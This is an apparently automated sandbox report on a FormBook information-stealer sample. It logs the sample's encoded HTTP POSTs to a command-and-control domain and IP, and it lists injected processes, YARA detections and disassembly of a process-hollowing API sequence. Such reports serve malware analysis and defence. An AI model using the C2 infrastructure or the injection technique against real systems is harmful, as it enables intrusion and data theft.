                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6b 73 4b 34 36 54 49 67 2b 4f 73 72 75 79 2b 42 4a 57 55 55 75 63 39 37 66 33 33 6c 56 58 44 47 63 53 2f 54 30 2f 4e 4c 4e 47 70 62 45 65 6e 53 65 58 4e 61 6a 36 57 79 4b 66 45 68 73 44 45 4d 50 50 2b 72 71 71 46 6a 41 55 7a 6c 61 31 64 67 42 59 41 79 39 62 58 67 6d 42 70 35 6a 56 54 53 30 6e 4c 31 48 53 6d 6b 70 6a 78 70 4f 48 46 4f 52 33 38 59 6f 74 73 4d 2b 70 6b 72 46 49 2f 39 77 35 44 50 55 76 35 5a 79 4f 67 49 4e 6f 78 34 4f 6b 6a 74 45 46 73 65 72 55 75 59 6d 51 66 6d 2f 53 63 32 79 45 72 34 38 66 63 79 47 34 67 4a 57 48 69 6c 30 4b 70 50 34 42 73 51 62 45 47 70 50 79 4e 53 57 44 79 6c 47 39 44 38 64 64 55 69 4a 45 49 68 57 67 3d
                                                                                                    Data Ascii: ABqDW6A8=iksK46TIg+Osruy+BJWUUuc97f33lVXDGcS/T0/NLNGpbEenSeXNaj6WyKfEhsDEMPP+rqqFjAUzla1dgBYAy9bXgmBp5jVTS0nL1HSmkpjxpOHFOR38YotsM+pkrFI/9w5DPUv5ZyOgINox4OkjtEFserUuYmQfm/Sc2yEr48fcyG4gJWHil0KpP4BsQbEGpPyNSWDylG9D8ddUiJEIhWg=
                                                                                                    May 2, 2024 08:28:01.877952099 CEST536INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:28:01 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
                                                                                                    May 2, 2024 08:28:01.878011942 CEST155INData Raw: 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    43192.168.2.449780101.99.93.15780
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:28:04.745999098 CEST7734OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6b 73 4b 34 36 54 49 67 2b 4f 73 72 75 79 2b 42 4a 57 55 55 75 63 39 37 66 33 33 6c 56 58 44 47 63 53 2f 54 30 2f 4e 4c 4e 4f 70 62 57 36 6e 53 35 6a 4e 62 6a 36 57 75 61 66 46 68 73 43 59 4d 50 6d 33 72 71 32 56 6a 43 73 7a 6e 2f 68 64 33 43 41 41 37 39 62 58 69 6d 42 6f 6d 7a 55 4a 53 31 58 50 31 44 2b 6d 6b 70 6a 78 70 4d 76 46 59 77 33 38 66 59 73 65 46 65 70 77 76 46 49 48 39 77 68 70 50 55 62 44 5a 43 75 67 4c 74 34 78 39 37 51 6a 75 6b 46 71 64 72 55 6d 59 6d 73 41 6d 2f 50 6e 32 78 5a 47 34 37 2f 63 78 6a 64 32 4f 30 47 38 78 55 65 57 5a 35 35 7a 4a 34 55 65 6b 50 43 4f 64 33 4c 47 6e 46 34 71 33 74 73 7a 37 62 77 38 38 42 57 45 36 37 6e 39 39 6e 64 53 41 69 6e 68 70 6e 6c 76 71 79 6d 55 47 44 36 54 6c 55 2b 53 53 37 61 76 53 45 5a 70 55 77 55 70 66 44 51 48 4d 57 37 4e 51 73 56 31 67 61 71 72 30 6d 50 54 4e 7a 74 6c 71 48 67 38 69 56 66 37 42 57 6d 42 39 6c 56 4a 6b 64 4a 4d 30 33 6c 36 39 65 68 47 78 46 4f 79 43 61 51 72 77 6d 42 76 54 44 76 4c 31 73 34 73 4b [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=iksK46TIg+Osruy+BJWUUuc97f33lVXDGcS/T0/NLNOpbW6nS5jNbj6WuafFhsCYMPm3rq2VjCszn/hd3CAA79bXimBomzUJS1XP1D+mkpjxpMvFYw38fYseFepwvFIH9whpPUbDZCugLt4x97QjukFqdrUmYmsAm/Pn2xZG47/cxjd2O0G8xUeWZ55zJ4UekPCOd3LGnF4q3tsz7bw88BWE67n99ndSAinhpnlvqymUGD6TlU+SS7avSEZpUwUpfDQHMW7NQsV1gaqr0mPTNztlqHg8iVf7BWmB9lVJkdJM03l69ehGxFOyCaQrwmBvTDvL1s4sK1LVWfGqz7NMUvRDDWZjShOKkvq9/HpWYGd/ZYSzu+fPoEMpPbkLKSGfL7gYTx1nGFiI9/UVDMctRZQYPhHxAnPewcs8ClOxqJ07KRDigC//3MX8qquFT2UDKFYAx5mI3J4hnYlI+fH2WupdSNRrRvvudam85d/PoC6kg9Fnzhx2XCGoKb+WWyXyVaHZ/qaOLMFCRLTOLdOukk+FqyDotxEVGvy/EQyQ+R9RVBlhT/8VyLjuJk1BNCXRS47/HjhNUysbLYUNIRvgmmoA41qjoH4obReTYwYTvMBOekLFT3IrU6YFNmbfJbG/NW1OfqCUPXZjUyrtzFudbz/zYhYkH5vJkWSdu65kh81DLM/0GVx3G3unwatcP/Dfg8YzbhH6NbRKtAv7qYPpOszmldSkFaz9QLUky991KO+Spdra3XocD92P1NsVNqQ76PdnY8wCnHmjgZ1pHKuIZnqOPBYmtH+XnBbBG5iVXk6u9hoWaluwWN77e/ZHZ/IGyclMmWozpc4nT7e7Yamd0Upz+pXpZoLdl/Zxr6/cTg9keIbunfisz9Ci5twYmxdS0fLRQIqB/NTbTFlLrI9b3VUrofIXk/C37/pf0COidWXRL1RWwoEZj6li4tadaA5F4o7nh88nPsouP38MCJ41/x/GjbVgF619/uMMX8mLG3J [TRUNCATED]
                                                                                                    May 2, 2024 08:28:04.940349102 CEST536INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:28:04 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
                                                                                                    May 2, 2024 08:28:04.940395117 CEST155INData Raw: 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                    May 2, 2024 08:28:04.943573952 CEST3076OUTData Raw: 52 47 44 54 51 44 45 78 35 53 49 35 7a 75 46 47 61 47 55 36 62 5a 4f 74 65 57 56 57 75 33 7a 6a 38 46 6b 32 73 58 56 38 58 32 61 55 41 5a 44 4f 73 34 38 34 66 4f 30 50 53 44 33 59 49 35 53 66 44 73 55 48 54 51 32 56 74 75 41 42 45 6f 42 77 56 6d
                                                                                                    Data Ascii: RGDTQDEx5SI5zuFGaGU6bZOteWVWu3zj8Fk2sXV8X2aUAZDOs484fO0PSD3YI5SfDsUHTQ2VtuABEoBwVm04v4s54rtaeNkLXx7U2zkKFAzcSU90jTGzG6W3ziW04EpPw7PffrYD4bG7APW37F8uYCNxfyHk/xuKeE7ZtzoHBBk0H0V35C/PT3ZOlXXrT8vT2dgCml/D9kNCei14taXXXfZY5Q9aw6i5/yPaXAfpq357qJ3ho43


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x6d0000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:08:23:52
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\yZcecBUXN7.exe"
                                                                                                    Imagebase:0x690000
                                                                                                    File size:631'808 bytes
                                                                                                    MD5 hash:9CD48F0D93C28AE6559409DE23414554
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:08:24:07
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:08:24:12
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                    Imagebase:0x1560000
                                                                                                    File size:82'432 bytes
                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:08:24:27
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:140'800 bytes
                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:08:24:50
                                                                                                    Start date:02/05/2024
                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:676'768 bytes
                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.6%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:21
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 11892 ccb988 ReadProcessMemory 11893 ccba47 11892->11893 11898 cca4d8 11899 cca521 Wow64SetThreadContext 11898->11899 11901 cca599 11899->11901 11902 cca758 11903 cca79c VirtualAllocEx 11902->11903 11905 cca814 11903->11905 11906 ccb558 11907 ccb5e5 CreateProcessW 11906->11907 11909 ccb73e 11907->11909 11910 cca878 11911 cca8bc ResumeThread 11910->11911 11913 cca908 11911->11913 11914 ccb878 11915 ccb8eb Wow64GetThreadContext 11914->11915 11916 ccb8d6 11914->11916 11917 ccb934 11915->11917 11916->11915 11894 cca600 11895 cca64c WriteProcessMemory 11894->11895 11897 cca6e5 11895->11897

                                                                                                      Executed Functions

                                                                                                      Function 00CCB558 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 30 ccb558-ccb5e3 31 ccb5fa-ccb608 30->31 32 ccb5e5-ccb5f7 30->32 33 ccb61f-ccb65b 31->33 34 ccb60a-ccb61c 31->34 32->31 35 ccb65d-ccb66c 33->35 36 ccb66f-ccb73c CreateProcessW 33->36 34->33 35->36 40 ccb73e-ccb744 36->40 41 ccb745-ccb804 36->41 40->41 51 ccb83a-ccb845 41->51 52 ccb806-ccb82f 41->52 52->51
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CCB729
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 8db3ff95fa51076e529ac150582e44590c95cea2cd39a720463863891d0c6400
                                                                                                      • Instruction ID: ccd203f0e7d500f85f1386c73d68284faed00b3b0a6dca8c47b2b51f869d5dde
                                                                                                      • Opcode Fuzzy Hash: 8db3ff95fa51076e529ac150582e44590c95cea2cd39a720463863891d0c6400
                                                                                                      • Instruction Fuzzy Hash: 5581CF74C00269DFDB21CFA9C980BDDBBF5AB49304F1491AAE508B7260DB749E89CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCA600 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 56 cca600-cca66b 58 cca66d-cca67f 56->58 59 cca682-cca6e3 WriteProcessMemory 56->59 58->59 61 cca6ec-cca73e 59->61 62 cca6e5-cca6eb 59->62 62->61
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CCA6D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 63cfb0788624558b9ed383e01d572d66366fed996d1bdf3105c0e3e3effa2091
                                                                                                      • Instruction ID: 29a941f7ae8806c197e0da43b5cfbab1ea07dedaf02ecfda813a7c2fcf6565ce
                                                                                                      • Opcode Fuzzy Hash: 63cfb0788624558b9ed383e01d572d66366fed996d1bdf3105c0e3e3effa2091
                                                                                                      • Instruction Fuzzy Hash: 6D4198B5D012589FCF00CFA9D984ADEFBF1BB49314F24902AE818B7210D738AA45CB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCA758 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 67 cca758-cca812 VirtualAllocEx 70 cca81b-cca865 67->70 71 cca814-cca81a 67->71 71->70
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CCA802
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 100dc572ef192e8f94ef061eb17e78fb1aba6cdc76a73624edb069455b58e12f
                                                                                                      • Instruction ID: 1abd6c7d0f3f22e83a0afa4686312683be212b9a7aeadd21d4dca5fdb9e3f80f
                                                                                                      • Opcode Fuzzy Hash: 100dc572ef192e8f94ef061eb17e78fb1aba6cdc76a73624edb069455b58e12f
                                                                                                      • Instruction Fuzzy Hash: F33186B9D00258DFCF10CFA9D984ADEFBB1BB49320F10942AE815B7250D735A946CF69
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCB988 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 76 ccb988-ccba45 ReadProcessMemory 77 ccba4e-ccba8c 76->77 78 ccba47-ccba4d 76->78 78->77
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CCBA35
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 6ee1b263f37700fa47de9ff7e5978bc041b2ea4546625e34e237bfbfda053ab3
                                                                                                      • Instruction ID: 6a9a9f4adb65fc7ffeb9af746eb49fce00b58ec886a3ecfcc0931e3567dc487b
                                                                                                      • Opcode Fuzzy Hash: 6ee1b263f37700fa47de9ff7e5978bc041b2ea4546625e34e237bfbfda053ab3
                                                                                                      • Instruction Fuzzy Hash: D53187B9D04258DFCF10CFAAD984ADEFBB1BB19310F10A02AE814B7210D335A945CF64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCA4D8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 81 cca4d8-cca538 83 cca54f-cca597 Wow64SetThreadContext 81->83 84 cca53a-cca54c 81->84 86 cca599-cca59f 83->86 87 cca5a0-cca5ec 83->87 84->83 86->87
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CCA587
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: f41dff7ee8740dc2bdb8cca13314cdf8686d8d30dd83fb9259e3658b2a90d8c0
                                                                                                      • Instruction ID: b836e9bd9f9efd616cf0d3842eef30acfb30ba64e53f9133edb23ab328f6b201
                                                                                                      • Opcode Fuzzy Hash: f41dff7ee8740dc2bdb8cca13314cdf8686d8d30dd83fb9259e3658b2a90d8c0
                                                                                                      • Instruction Fuzzy Hash: 0C31BCB4D00258DFCB10CFAAD984AEEFBF1BB49314F24802AE414B7240D738A985CF54
